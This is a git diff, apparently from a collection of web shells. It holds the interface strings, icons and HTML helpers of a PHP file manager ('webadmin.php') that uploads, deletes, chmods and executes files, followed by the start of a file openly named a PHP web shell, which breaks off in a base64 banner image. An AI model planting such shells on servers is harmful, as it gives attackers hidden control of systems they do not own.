+'delete' => 'verwijderen',
+'rename' => 'hernoemen',
+'move' => 'verplaatsen',
+'copy' => 'kopieren',
+'edit' => 'bewerken',
+'download' => 'downloaden',
+'upload' => 'uploaden',
+'create' => 'aanmaken',
+'change' => 'veranderen',
+'save' => 'opslaan',
+'set' => 'instellen',
+'reset' => 'resetten',
+'relative' => 'Relatief pat naar doel',
+
+'yes' => 'Ja',
+'no' => 'Nee',
+'back' => 'terug',
+'destination' => 'Bestemming',
+'symlink' => 'Symlink',
+'no_output' => 'geen output',
+
+'user' => 'Gebruiker',
+'password' => 'Wachtwoord',
+'add' => 'toevoegen',
+'add_basic_auth' => 'add basic-authentification',
+
+'uploaded' => '"[%1]" is verstuurd.',
+'not_uploaded' => '"[%1]" kan niet worden verstuurd.',
+'already_exists' => '"[%1]" bestaat al.',
+'created' => '"[%1]" is aangemaakt.',
+'not_created' => '"[%1]" kan niet worden aangemaakt.',
+'really_delete' => 'Deze bestanden verwijderen?',
+'deleted' => "Deze bestanden zijn verwijderd:\n[%1]",
+'not_deleted' => "Deze bestanden konden niet worden verwijderd:\n[%1]",
+'rename_file' => 'Bestandsnaam veranderen:',
+'renamed' => '"[%1]" heet nu "[%2]".',
+'not_renamed' => '"[%1] kon niet worden veranderd in "[%2]".',
+'move_files' => 'Verplaats deze bestanden:',
+'moved' => "Deze bestanden zijn verplaatst naar \"[%2]\":\n[%1]",
+'not_moved' => "Kan deze bestanden niet verplaatsen naar \"[%2]\":\n[%1]",
+'copy_files' => 'Kopieer deze bestanden:',
+'copied' => "Deze bestanden zijn gekopieerd naar \"[%2]\":\n[%1]",
+'not_copied' => "Deze bestanden kunnen niet worden gekopieerd naar \"[%2]\":\n[%1]",
+'not_edited' => '"[%1]" kan niet worden bewerkt.',
+'executed' => "\"[%1]\" is met succes uitgevoerd:\n{%2}",
+'not_executed' => "\"[%1]\" is niet goed uitgevoerd:\n{%2}",
+'saved' => '"[%1]" is opgeslagen.',
+'not_saved' => '"[%1]" is niet opgeslagen.',
+'symlinked' => 'Symlink van "[%2]" naar "[%1]" is aangemaakt.',
+'not_symlinked' => 'Symlink van "[%2]" naar "[%1]" is niet aangemaakt.',
+'permission_for' => 'Bevoegdheid voor "[%1]":',
+'permission_set' => 'Bevoegdheid van "[%1]" is ingesteld op [%2].',
+'permission_not_set' => 'Bevoegdheid van "[%1]" is niet ingesteld op [%2].',
+'not_readable' => '"[%1]" kan niet worden gelezen.'
+		);
+
+	case 'se':
+
+		$date_format = 'n/j/y H:i:s';
+		$word_charset = 'ISO-8859-1';
+ 
+		return array(
+'directory' => 'Mapp',
+'file' => 'Fil',
+'filename' => 'Filnamn',
+ 
+'size' => 'Storlek',
+'permission' => 'S�kerhetsniv�',
+'owner' => '�gare',
+'group' => 'Grupp',
+'other' => 'Andra',
+'functions' => 'Funktioner',
+ 
+'read' => 'L�s',
+'write' => 'Skriv',
+'execute' => 'Utf�r',
+ 
+'create_symlink' => 'Skapa symlink',
+'delete' => 'Radera',
+'rename' => 'Byt namn',
+'move' => 'Flytta',
+'copy' => 'Kopiera',
+'edit' => '�ndra',
+'download' => 'Ladda ner',
+'upload' => 'Ladda upp',
+'create' => 'Skapa',
+'change' => '�ndra',
+'save' => 'Spara',
+'set' => 'Markera',
+'reset' => 'T�m',
+'relative' => 'Relative path to target',
+ 
+'yes' => 'Ja',
+'no' => 'Nej',
+'back' => 'Tillbaks',
+'destination' => 'Destination',
+'symlink' => 'Symlink',
+'no_output' => 'no output',
+ 
+'user' => 'Anv�ndare',
+'password' => 'L�senord',
+'add' => 'L�gg till',
+'add_basic_auth' => 'add basic-authentification',
+ 
+'uploaded' => '"[%1]" har laddats upp.',
+'not_uploaded' => '"[%1]" kunde inte laddas upp.',
+'already_exists' => '"[%1]" finns redan.',
+'created' => '"[%1]" har skapats.',
+'not_created' => '"[%1]" kunde inte skapas.',
+'really_delete' => 'Radera dessa filer?',
+'deleted' => "De h�r filerna har raderats:\n[%1]",
+'not_deleted' => "Dessa filer kunde inte raderas:\n[%1]",
+'rename_file' => 'Byt namn p� fil:',
+'renamed' => '"[%1]" har bytt namn till "[%2]".',
+'not_renamed' => '"[%1] kunde inte d�pas om till "[%2]".',
+'move_files' => 'Flytta dessa filer:',
+'moved' => "Dessa filer har flyttats till \"[%2]\":\n[%1]",
+'not_moved' => "Dessa filer kunde inte flyttas till \"[%2]\":\n[%1]",
+'copy_files' => 'Kopiera dessa filer:',
+'copied' => "Dessa filer har kopierats till \"[%2]\":\n[%1]",
+'not_copied' => "Dessa filer kunde inte kopieras till \"[%2]\":\n[%1]",
+'not_edited' => '"[%1]" kan inte �ndras.',
+'executed' => "\"[%1]\" har utf�rts:\n{%2}",
+'not_executed' => "\"[%1]\" kunde inte utf�ras:\n{%2}",
+'saved' => '"[%1]" har sparats.',
+'not_saved' => '"[%1]" kunde inte sparas.',
+'symlinked' => 'Symlink fr�n "[%2]" till "[%1]" har skapats.',
+'not_symlinked' => 'Symlink fr�n "[%2]" till "[%1]" kunde inte skapas.',
+'permission_for' => 'R�ttigheter f�r "[%1]":',
+'permission_set' => 'R�ttigheter f�r "[%1]" �ndrades till [%2].',
+'permission_not_set' => 'Permission of "[%1]" could not be set to [%2].',
+'not_readable' => '"[%1]" kan inte l�sas.'
+		);
+
+	case 'sp':
+
+		$date_format = 'j/n/y H:i:s';
+		$word_charset = 'ISO-8859-1';
+
+		return array(
+'directory' => 'Directorio',
+'file' => 'Archivo',
+'filename' => 'Nombre Archivo',
+
+'size' => 'Tama�o',
+'permission' => 'Permisos',
+'owner' => 'Propietario',
+'group' => 'Grupo',
+'other' => 'Otros',
+'functions' => 'Funciones',
+
+'read' => 'lectura',
+'write' => 'escritura',
+'execute' => 'ejecuci�n',
+
+'create_symlink' => 'crear enlace',
+'delete' => 'borrar',
+'rename' => 'renombrar',
+'move' => 'mover',
+'copy' => 'copiar',
+'edit' => 'editar',
+'download' => 'bajar',
+'upload' => 'subir',
+'create' => 'crear',
+'change' => 'cambiar',
+'save' => 'salvar',
+'set' => 'setear',
+'reset' => 'resetear',
+'relative' => 'Path relativo',
+
+'yes' => 'Si',
+'no' => 'No',
+'back' => 'atr�s',
+'destination' => 'Destino',
+'symlink' => 'Enlace',
+'no_output' => 'sin salida',
+
+'user' => 'Usuario',
+'password' => 'Clave',
+'add' => 'agregar',
+'add_basic_auth' => 'agregar autentificaci�n b�sica',
+
+'uploaded' => '"[%1]" ha sido subido.',
+'not_uploaded' => '"[%1]" no pudo ser subido.',
+'already_exists' => '"[%1]" ya existe.',
+'created' => '"[%1]" ha sido creado.',
+'not_created' => '"[%1]" no pudo ser creado.',
+'really_delete' => '�Borra estos archivos?',
+'deleted' => "Estos archivos han sido borrados:\n[%1]",
+'not_deleted' => "Estos archivos no pudieron ser borrados:\n[%1]",
+'rename_file' => 'Renombra archivo:',
+'renamed' => '"[%1]" ha sido renombrado a "[%2]".',
+'not_renamed' => '"[%1] no pudo ser renombrado a "[%2]".',
+'move_files' => 'Mover estos archivos:',
+'moved' => "Estos archivos han sido movidos a \"[%2]\":\n[%1]",
+'not_moved' => "Estos archivos no pudieron ser movidos a \"[%2]\":\n[%1]",
+'copy_files' => 'Copiar estos archivos:',
+'copied' => "Estos archivos han sido copiados a  \"[%2]\":\n[%1]",
+'not_copied' => "Estos archivos no pudieron ser copiados \"[%2]\":\n[%1]",
+'not_edited' => '"[%1]" no pudo ser editado.',
+'executed' => "\"[%1]\" ha sido ejecutado correctamente:\n{%2}",
+'not_executed' => "\"[%1]\" no pudo ser ejecutado correctamente:\n{%2}",
+'saved' => '"[%1]" ha sido salvado.',
+'not_saved' => '"[%1]" no pudo ser salvado.',
+'symlinked' => 'Enlace desde "[%2]" a "[%1]" ha sido creado.',
+'not_symlinked' => 'Enlace desde "[%2]" a "[%1]" no pudo ser creado.',
+'permission_for' => 'Permisos de "[%1]":',
+'permission_set' => 'Permisos de "[%1]" fueron seteados a [%2].',
+'permission_not_set' => 'Permisos de "[%1]" no pudo ser seteado a [%2].',
+'not_readable' => '"[%1]" no pudo ser le�do.'
+		);
+
+	case 'dk':
+
+		$date_format = 'n/j/y H:i:s';
+		$word_charset = 'ISO-8859-1';
+
+		return array(
+'directory' => 'Mappe',
+'file' => 'Fil',
+'filename' => 'Filnavn',
+
+'size' => 'St�rrelse',
+'permission' => 'Rettighed',
+'owner' => 'Ejer',
+'group' => 'Gruppe',
+'other' => 'Andre',
+'functions' => 'Funktioner',
+
+'read' => 'l�s',
+'write' => 'skriv',
+'execute' => 'k�r',
+
+'create_symlink' => 'opret symbolsk link',
+'delete' => 'slet',
+'rename' => 'omd�b',
+'move' => 'flyt',
+'copy' => 'kopier',
+'edit' => 'rediger',
+'download' => 'download',
+'upload' => 'upload',
+'create' => 'opret',
+'change' => 'skift',
+'save' => 'gem',
+'set' => 's�t',
+'reset' => 'nulstil',
+'relative' => 'Relativ sti til valg',
+
+'yes' => 'Ja',
+'no' => 'Nej',
+'back' => 'tilbage',
+'destination' => 'Distination',
+'symlink' => 'Symbolsk link',
+'no_output' => 'ingen resultat',
+
+'user' => 'Bruger',
+'password' => 'Kodeord',
+'add' => 'tilf�j',
+'add_basic_auth' => 'tilf�j grundliggende rettigheder',
+
+'uploaded' => '"[%1]" er blevet uploaded.',
+'not_uploaded' => '"[%1]" kunnu ikke uploades.',
+'already_exists' => '"[%1]" findes allerede.',
+'created' => '"[%1]" er blevet oprettet.',
+'not_created' => '"[%1]" kunne ikke oprettes.',
+'really_delete' => 'Slet disse filer?',
+'deleted' => "Disse filer er blevet slettet:\n[%1]",
+'not_deleted' => "Disse filer kunne ikke slettes:\n[%1]",
+'rename_file' => 'Omd�d fil:',
+'renamed' => '"[%1]" er blevet omd�bt til "[%2]".',
+'not_renamed' => '"[%1] kunne ikke omd�bes til "[%2]".',
+'move_files' => 'Flyt disse filer:',
+'moved' => "Disse filer er blevet flyttet til \"[%2]\":\n[%1]",
+'not_moved' => "Disse filer kunne ikke flyttes til \"[%2]\":\n[%1]",
+'copy_files' => 'Kopier disse filer:',
+'copied' => "Disse filer er kopieret til \"[%2]\":\n[%1]",
+'not_copied' => "Disse filer kunne ikke kopieres til \"[%2]\":\n[%1]",
+'not_edited' => '"[%1]" kan ikke redigeres.',
+'executed' => "\"[%1]\" er blevet k�rt korrekt:\n{%2}",
+'not_executed' => "\"[%1]\" kan ikke k�res korrekt:\n{%2}",
+'saved' => '"[%1]" er blevet gemt.',
+'not_saved' => '"[%1]" kunne ikke gemmes.',
+'symlinked' => 'Symbolsk link fra "[%2]" til "[%1]" er blevet oprettet.',
+'not_symlinked' => 'Symbolsk link fra "[%2]" til "[%1]" kunne ikke oprettes.',
+'permission_for' => 'Rettigheder for "[%1]":',
+'permission_set' => 'Rettigheder for "[%1]" blev sat til [%2].',
+'permission_not_set' => 'Rettigheder for "[%1]" kunne ikke s�ttes til [%2].',
+'not_readable' => '"[%1]" Kan ikke l�ses.'
+		);
+
+	case 'tr':
+
+		$date_format = 'n/j/y H:i:s';
+		$word_charset = 'ISO-8859-1';
+
+		return array(
+'directory' => 'Klas�r',
+'file' => 'Dosya',
+'filename' => 'dosya adi',
+
+'size' => 'boyutu',
+'permission' => 'Izin',
+'owner' => 'sahib',
+'group' => 'Grup',
+'other' => 'Digerleri',
+'functions' => 'Fonksiyonlar',
+
+'read' => 'oku',
+'write' => 'yaz',
+'execute' => '�alistir',
+
+'create_symlink' => 'yarat symlink',
+'delete' => 'sil',
+'rename' => 'ad degistir',
+'move' => 'tasi',
+'copy' => 'kopyala',
+'edit' => 'd�zenle',
+'download' => 'indir',
+'upload' => 'y�kle',
+'create' => 'create',
+'change' => 'degistir',
+'save' => 'kaydet',
+'set' => 'ayar',
+'reset' => 'sifirla',
+'relative' => 'Hedef yola g�re',
+
+'yes' => 'Evet',
+'no' => 'Hayir',
+'back' => 'Geri',
+'destination' => 'Hedef',
+'symlink' => 'K�sa yol',
+'no_output' => '�ikti yok',
+
+'user' => 'Kullanici',
+'password' => 'Sifre',
+'add' => 'ekle',
+'add_basic_auth' => 'ekle basit-authentification',
+
+'uploaded' => '"[%1]" y�klendi.',
+'not_uploaded' => '"[%1]" y�klenemedi.',
+'already_exists' => '"[%1]" kullanilmakta.',
+'created' => '"[%1]" olusturuldu.',
+'not_created' => '"[%1]" olusturulamadi.',
+'really_delete' => 'Bu dosyalari silmek istediginizden eminmisiniz?',
+'deleted' => "Bu dosyalar silindi:\n[%1]",
+'not_deleted' => "Bu dosyalar silinemedi:\n[%1]",
+'rename_file' => 'Adi degisen dosya:',
+'renamed' => '"[%1]" adili dosyanin yeni adi "[%2]".',
+'not_renamed' => '"[%1] adi degistirilemedi "[%2]" ile.',
+'move_files' => 'Tasinan dosyalar:',
+'moved' => "Bu dosyalari tasidiginiz yer \"[%2]\":\n[%1]",
+'not_moved' => "Bu dosyalari tasiyamadiginiz yer \"[%2]\":\n[%1]",
+'copy_files' => 'Kopyalanan dosyalar:',
+'copied' => "Bu dosyalar kopyalandi \"[%2]\":\n[%1]",
+'not_copied' => "Bu dosyalar kopyalanamiyor \"[%2]\":\n[%1]",
+'not_edited' => '"[%1]" d�zenlenemiyor.',
+'executed' => "\"[%1]\" basariyla �alistirildi:\n{%2}",
+'not_executed' => "\"[%1]\" �alistirilamadi:\n{%2}",
+'saved' => '"[%1]" kaydedildi.',
+'not_saved' => '"[%1]" kaydedilemedi.',
+'symlinked' => '"[%2]" den "[%1]" e k�sayol olu�turuldu.',
+'not_symlinked' => '"[%2]"den "[%1]" e k�sayol olu�turulamad�.',
+'permission_for' => 'Izinler "[%1]":',
+'permission_set' => 'Izinler "[%1]" degistirildi [%2].',
+'permission_not_set' => 'Izinler "[%1]" degistirilemedi [%2].',
+'not_readable' => '"[%1]" okunamiyor.'
+		);
+
+	case 'cs':
+
+		$date_format = 'd.m.y H:i:s';
+		$word_charset = 'UTF-8';
+
+		return array(
+'directory' => 'Adresář',
+'file' => 'Soubor',
+'filename' => 'Jméno souboru',
+
+'size' => 'Velikost',
+'permission' => 'Práva',
+'owner' => 'Vlastník',
+'group' => 'Skupina',
+'other' => 'Ostatní',
+'functions' => 'Funkce',
+
+'read' => 'Čtení',
+'write' => 'Zápis',
+'execute' => 'Spouštění',
+
+'create_symlink' => 'Vytvořit symbolický odkaz',
+'delete' => 'Smazat',
+'rename' => 'Přejmenovat',
+'move' => 'Přesunout',
+'copy' => 'Zkopírovat',
+'edit' => 'Otevřít',
+'download' => 'Stáhnout',
+'upload' => 'Nahraj na server',
+'create' => 'Vytvořit',
+'change' => 'Změnit',
+'save' => 'Uložit',
+'set' => 'Nastavit',
+'reset' => 'zpět',
+'relative' => 'Relatif',
+
+'yes' => 'Ano',
+'no' => 'Ne',
+'back' => 'Zpět',
+'destination' => 'Destination',
+'symlink' => 'Symbolický odkaz',
+'no_output' => 'Prázdný výstup',
+
+'user' => 'Uživatel',
+'password' => 'Heslo',
+'add' => 'Přidat',
+'add_basic_auth' => 'přidej základní autentizaci',
+
+'uploaded' => 'Soubor "[%1]" byl nahrán na server.',
+'not_uploaded' => 'Soubor "[%1]" nebyl nahrán na server.',
+'already_exists' => 'Soubor "[%1]" už exituje.',
+'created' => 'Soubor "[%1]" byl vytvořen.',
+'not_created' => 'Soubor "[%1]" nemohl být  vytvořen.',
+'really_delete' => 'Vymazat soubor?',
+'deleted' => "Byly vymazány tyto soubory:\n[%1]",
+'not_deleted' => "Tyto soubory nemohly být vytvořeny:\n[%1]",
+'rename_file' => 'Přejmenuj soubory:',
+'renamed' => 'Soubor "[%1]" byl přejmenován na "[%2]".',
+'not_renamed' => 'Soubor "[%1]" nemohl být přejmenován na "[%2]".',
+'move_files' => 'Přemístit tyto soubory:',
+'moved' => "Tyto soubory byly přemístěny do \"[%2]\":\n[%1]",
+'not_moved' => "Tyto soubory nemohly být přemístěny do \"[%2]\":\n[%1]",
+'copy_files' => 'Zkopírovat tyto soubory:',
+'copied' => "Tyto soubory byly zkopírovány do \"[%2]\":\n[%1]",
+'not_copied' => "Tyto soubory nemohly být zkopírovány do \"[%2]\":\n[%1]",
+'not_edited' => 'Soubor "[%1]" nemohl být otevřen.',
+'executed' => "SOubor \"[%1]\" byl spuštěn :\n{%2}",
+'not_executed' => "Soubor \"[%1]\" nemohl být spuštěn:\n{%2}",
+'saved' => 'Soubor "[%1]" byl uložen.',
+'not_saved' => 'Soubor "[%1]" nemohl být uložen.',
+'symlinked' => 'Byl vyvořen symbolický odkaz "[%2]" na soubor "[%1]".',
+'not_symlinked' => 'Symbolický odkaz "[%2]" na soubor "[%1]" nemohl být vytvořen.',
+'permission_for' => 'Práva k "[%1]":',
+'permission_set' => 'Práva k "[%1]" byla změněna na [%2].',
+'permission_not_set' => 'Práva k "[%1]" nemohla být změněna na [%2].',
+'not_readable' => 'Soubor "[%1]" není možno přečíst.'
+		);
+
+	case 'en':
+	default:
+
+		$date_format = 'n/j/y H:i:s';
+		$word_charset = 'ISO-8859-1';
+
+		return array(
+'directory' => 'Directory',
+'file' => 'File',
+'filename' => 'Filename',
+
+'size' => 'Size',
+'permission' => 'Permission',
+'owner' => 'Owner',
+'group' => 'Group',
+'other' => 'Others',
+'functions' => 'Functions',
+
+'read' => 'read',
+'write' => 'write',
+'execute' => 'execute',
+
+'create_symlink' => 'create symlink',
+'delete' => 'delete',
+'rename' => 'rename',
+'move' => 'move',
+'copy' => 'copy',
+'edit' => 'edit',
+'download' => 'download',
+'upload' => 'upload',
+'create' => 'create',
+'change' => 'change',
+'save' => 'save',
+'set' => 'set',
+'reset' => 'reset',
+'relative' => 'Relative path to target',
+
+'yes' => 'Yes',
+'no' => 'No',
+'back' => 'back',
+'destination' => 'Destination',
+'symlink' => 'Symlink',
+'no_output' => 'no output',
+
+'user' => 'User',
+'password' => 'Password',
+'add' => 'add',
+'add_basic_auth' => 'add basic-authentification',
+
+'uploaded' => '"[%1]" has been uploaded.',
+'not_uploaded' => '"[%1]" could not be uploaded.',
+'already_exists' => '"[%1]" already exists.',
+'created' => '"[%1]" has been created.',
+'not_created' => '"[%1]" could not be created.',
+'really_delete' => 'Delete these files?',
+'deleted' => "These files have been deleted:\n[%1]",
+'not_deleted' => "These files could not be deleted:\n[%1]",
+'rename_file' => 'Rename file:',
+'renamed' => '"[%1]" has been renamed to "[%2]".',
+'not_renamed' => '"[%1] could not be renamed to "[%2]".',
+'move_files' => 'Move these files:',
+'moved' => "These files have been moved to \"[%2]\":\n[%1]",
+'not_moved' => "These files could not be moved to \"[%2]\":\n[%1]",
+'copy_files' => 'Copy these files:',
+'copied' => "These files have been copied to \"[%2]\":\n[%1]",
+'not_copied' => "These files could not be copied to \"[%2]\":\n[%1]",
+'not_edited' => '"[%1]" can not be edited.',
+'executed' => "\"[%1]\" has been executed successfully:\n{%2}",
+'not_executed' => "\"[%1]\" could not be executed successfully:\n{%2}",
+'saved' => '"[%1]" has been saved.',
+'not_saved' => '"[%1]" could not be saved.',
+'symlinked' => 'Symlink from "[%2]" to "[%1]" has been created.',
+'not_symlinked' => 'Symlink from "[%2]" to "[%1]" could not be created.',
+'permission_for' => 'Permission of "[%1]":',
+'permission_set' => 'Permission of "[%1]" was set to [%2].',
+'permission_not_set' => 'Permission of "[%1]" could not be set to [%2].',
+'not_readable' => '"[%1]" can not be read.'
+		);
+
+	}
+
+}
+
+function getimage ($image) {
+	switch ($image) {
+	case 'file':
+		return base64_decode('R0lGODlhEQANAJEDAJmZmf///wAAAP///yH5BAHoAwMALAAAAAARAA0AAAItnIGJxg0B42rsiSvCA/REmXQWhmnih3LUSGaqg35vFbSXucbSabunjnMohq8CADsA');
+	case 'folder':
+		return base64_decode('R0lGODlhEQANAJEDAJmZmf///8zMzP///yH5BAHoAwMALAAAAAARAA0AAAIqnI+ZwKwbYgTPtIudlbwLOgCBQJYmCYrn+m3smY5vGc+0a7dhjh7ZbygAADsA');
+	case 'hidden_file':
+		return base64_decode('R0lGODlhEQANAJEDAMwAAP///5mZmf///yH5BAHoAwMALAAAAAARAA0AAAItnIGJxg0B42rsiSvCA/REmXQWhmnih3LUSGaqg35vFbSXucbSabunjnMohq8CADsA');
+	case 'link':
+		return base64_decode('R0lGODlhEQANAKIEAJmZmf///wAAAMwAAP///wAAAAAAAAAAACH5BAHoAwQALAAAAAARAA0AAAM5SArcrDCCQOuLcIotwgTYUllNOA0DxXkmhY4shM5zsMUKTY8gNgUvW6cnAaZgxMyIM2zBLCaHlJgAADsA');
+	case 'smiley':
+		return base64_decode('R0lGODlhEQANAJECAAAAAP//AP///wAAACH5BAHoAwIALAAAAAARAA0AAAIslI+pAu2wDAiz0jWD3hqmBzZf1VCleJQch0rkdnppB3dKZuIygrMRE/oJDwUAOwA=');
+	case 'arrow':
+		return base64_decode('R0lGODlhEQANAIABAAAAAP///yH5BAEKAAEALAAAAAARAA0AAAIdjA9wy6gNQ4pwUmav0yvn+hhJiI3mCJ6otrIkxxQAOw==');
+	}
+}
+
+function html_header () {
+	global $site_charset;
+
+	echo <<<END
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
+     "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html xmlns="http://www.w3.org/1999/xhtml">
+<head>
+
+<meta http-equiv="Content-Type" content="text/html; charset=$site_charset" />
+
+<title>webadmin.php</title>
+
+<style type="text/css">
+body { font: small sans-serif; text-align: center }
+img { width: 17px; height: 13px }
+a, a:visited { text-decoration: none; color: navy }
+hr { border-style: none; height: 1px; background-color: silver; color: silver }
+#main { margin-top: 6pt; margin-left: auto; margin-right: auto; border-spacing: 1px }
+#main th { background: #eee; padding: 3pt 3pt 0pt 3pt }
+.listing th, .listing td { padding: 1px 3pt 0 3pt }
+.listing th { border: 1px solid silver }
+.listing td { border: 1px solid #ddd; background: white }
+.listing .checkbox { text-align: center }
+.listing .filename { text-align: left }
+.listing .size { text-align: right }
+.listing .permission_header { text-align: left }
+.listing .permission { font-family: monospace }
+.listing .owner { text-align: left }
+.listing .group { text-align: left }
+.listing .functions { text-align: left }
+.listing_footer td { background: #eee; border: 1px solid silver }
+#directory, #upload, #create, .listing_footer td, #error td, #notice td { text-align: left; padding: 3pt }
+#directory { background: #eee; border: 1px solid silver }
+#upload { padding-top: 1em }
+#create { padding-bottom: 1em }
+.small, .small option { font-size: x-small }
+textarea { border: none; background: white }
+table.dialog { margin-left: auto; margin-right: auto }
+td.dialog { background: #eee; padding: 1ex; border: 1px solid silver; text-align: center }
+#permission { margin-left: auto; margin-right: auto }
+#permission td { padding-left: 3pt; padding-right: 3pt; text-align: center }
+td.permission_action { text-align: right }
+#symlink { background: #eee; border: 1px solid silver }
+#symlink td { text-align: left; padding: 3pt }
+#red_button { width: 120px; color: #400 }
+#green_button { width: 120px; color: #040 }
+#error td { background: maroon; color: white; border: 1px solid silver }
+#notice td { background: green; color: white; border: 1px solid silver }
+#notice pre, #error pre { background: silver; color: black; padding: 1ex; margin-left: 1ex; margin-right: 1ex }
+code { font-size: 12pt }
+td { white-space: nowrap }
+</style>
+
+<script type="text/javascript">
+<!--
+function activate (name) {
+	if (document && document.forms[0] && document.forms[0].elements['focus']) {
+		document.forms[0].elements['focus'].value = name;
+	}
+}
+//-->
+</script>
+
+</head>
+<body>
+
+
+END;
+
+}
+
+function html_footer () {
+
+	echo <<<END
+</body>
+</html>
+END;
+
+}
+
+function notice ($phrase) {
+	global $cols;
+
+	$args = func_get_args();
+	array_shift($args);
+
+	return '<tr id="notice">
+	<td colspan="' . $cols . '">' . phrase($phrase, $args) . '</td>
+</tr>
+';
+
+}
+
+function error ($phrase) {
+	global $cols;
+
+	$args = func_get_args();
+	array_shift($args);
+
+	return '<tr id="error">
+	<td colspan="' . $cols . '">' . phrase($phrase, $args) . '</td>
+</tr>
+';
+
+}
+
+?>
diff --git a/xakep-shells/PHP/webshell.php.txt b/xakep-shells/PHP/webshell.php.txt
new file mode 100644
index 0000000..766b719
--- /dev/null
+++ b/xakep-shells/PHP/webshell.php.txt
@@ -0,0 +1,268 @@
+<?php
+
+//This PHP Web Shell was developed by Digital Outcast It is  open software and completely free to modify in any way you wish. Have fun and don't be all skiddy and just take credit for creating it. Bad things will happen if you do.
+$images = array( "banner" =>"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